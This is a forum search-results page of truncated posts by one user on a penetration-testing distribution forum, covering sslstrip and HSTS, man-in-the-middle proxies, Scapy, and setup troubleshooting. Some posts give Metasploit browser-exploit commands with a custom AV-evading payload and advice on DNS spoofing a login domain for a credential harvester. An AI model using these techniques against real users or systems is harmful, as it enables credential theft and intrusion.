Search:

Type: Posts; User: thaijames; Keyword(s):

Page 1 of 2 1 2

Search: Search took 0.00 seconds.

  1. Replies
    4
    Views
    7,394

    Re: HSTS and its effect on sslstrip

    I did some further reading. The header can only be set in a secure connection, which means that you could not use sslstrip or ettercap to intercept and remove the headers. Which makes sense.
    ...
  2. Replies
    4
    Views
    7,394

    Re: HSTS and its effect on sslstrip

    Thanks for the information.

    sslstrip can already change or remove headers. Look into the python code and you will see that you can strip the headers before they get to the victim.

    I could not...
  3. Replies
    113
    Views
    52,903

    Re: [script] for AV evasion

    That is what I thought, thanks for confirming it.
  4. Replies
    113
    Views
    52,903

    Re: [script] for AV evasion

    Thank you for you help

    I try the following:
    use exploit/windows/browser/msxml_get_definition_code_exec
    set EXE::Custom /root/test.exe
    set URIPATH test
    exploit -j

    When I access the generated...
  5. Replies
    113
    Views
    52,903

    Re: [script] for AV evasion

    Thank you for your work on this script. Works great as a standalone executable. This may sound ignorant, do you know any way to use the exe as a payload in metasploit?
  6. Replies
    5
    Views
    4,222

    Re: Combining Credential Harvester with DNS Spoofing

    I would only spoof part of the domain for example:
    192.168.0.111 (your ip) login.facebook.com

    since login.facebook.com does not exist, there is no problem when the victim is redirected to the...
  7. Replies
    1
    Views
    2,066

    Re: Questions about evading AV software with Python

    From what I understand, virus software has basically white listed anything that is python. I think that because just like java, they can't tell one python from the other to determine if it is...
  8. Replies
    1
    Views
    2,596

    Re: Bash Script for Scapy

    Scapy is python,

    so you should run it as a python script for example:

    #! /usr/bin/env python
    from scapy.all import *

    def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op in...
  9. Replies
    3
    Views
    6,132

    Re: HTTP injection options in MITM attack

    Both Charles Proxy and Burp have a headless mode (run without interface)

    If you come up with any good scripts to control any of these transparent proxies, would appreciate if you could share.
  10. Replies
    3
    Views
    6,132

    Re: HTTP injection options in MITM attack

    Charles Proxy is an excellent tool for this kind of thing, much better than burp. Using bash to read data from the web interface you can automate everything.
    You may also want to try Sergio Proxy...
  11. Re: Virtual Machine Bridged IP - Mac OSX Wireless - BT5

    Oh in case you were referring to the built in wireless card not USB, I have no problems with that either.
  12. Re: Virtual Machine Bridged IP - Mac OSX Wireless - BT5

    Hmm, I am not sure If I am answering your question properly but here is a more detailed answer:

    I am using a Mac Air running osx LION with latest version of VMware Fusion. I have 4-5 wireless...
  13. Re: Virtual Machine Bridged IP - Mac OSX Wireless - BT5

    No problems on osx Lion both BT5 and Ubuntu
  14. Discussioni: xplico

    by thaijames
    Replies
    3
    Views
    5,722

    Re: xplico

    Download the source code and then run make install
    Xplico has a step by step wiki on their web site. The .deb does not seem to work even on other versions of ubuntu

    excellent program, I don't...
  15. Replies
    10
    Views
    10,106

    Re: Wicd not showing any wireless connection

    WICD is the most frustrating piece of software on backtrack and one of the reasons people want to try and use a different distribution. hopefully with the new version of backtrack coming out based...
  16. Re: Riferimento: sslstrip -> proxychains -> squid --> odd behavior (at least for me)

    Remotely as SSH into a remote network and then use proxychains to sslstrip the remote network.
  17. Re: sslstrip -> proxychains -> squid --> odd behavior (at least for me)

    Very interesting use of Proxychains and SSLSTRIP, have you been sucessfull without the SQUID Proxy?

    Also wouldn't the IP tables need to be run on the remote server?

    Be interesting if you can...
  18. Discussioni: truecrypt backtrack

    by thaijames
    Replies
    3
    Views
    2,735

    Re: truecrypt backtrack

    No problem to have a hidden truecrypt partition, usually this is a partition inside another truecrypt partition.

    Unlike windows you can't boot from a Linux truecrypt partition.
  19. Replies
    5
    Views
    6,021

    Re: Mac Address Scanner...

    Almost all scanners (nmap, ettercap) provide mac address information. Have you never used a scanner before?
  20. Discussioni: Owned an Exposed

    by thaijames
    Replies
    8
    Views
    3,886

    Re: Owned an Exposed

    I think it is legitimate to ask these questions.

    The real question is how will we ever know the answer?

    And should pentesters be worried that they may be injecting backdoors on their customers...
  21. Discussioni: Google Earth 6

    by thaijames
    Replies
    8
    Views
    3,252

    Re: Google Earth 6

    run the following in terminal:
    ln -s /lib/ld-linux.so.2 /lib/ld-lsb.so.3
  22. Replies
    5
    Views
    4,414

    Re: BackTrack 4 R2 - Ferret Not Installed

    It is installed, the menus have changed a bit.
  23. Replies
    19
    Views
    26,668

    Sticky: Re: Upgrading BackTrack 4 Final (or R1) to BackTrack R2

    I get the same error on two different computers that previously have R1 installed:

    Errors were encountered while processing:
    ...
  24. Replies
    10
    Views
    30,862

    Re: Metasploit autopwn basics

    I have noticed that autopwn works fine using fastrack but does not work correctly when typing the same commands from the console (using sqlite3)
    anybody have any idea why?
  25. Replies
    16
    Views
    10,911

    Re: dd-wrt redirecting traffic to a sslstrip box

    I will try to do a proper tutorial when I have more time. in the meantime
    Here is what I do:

    #go the the tmp dir
    cd /tmp

    #Download the file
    wget...
Results 1 to 25 of 40
Page 1 of 2 1 2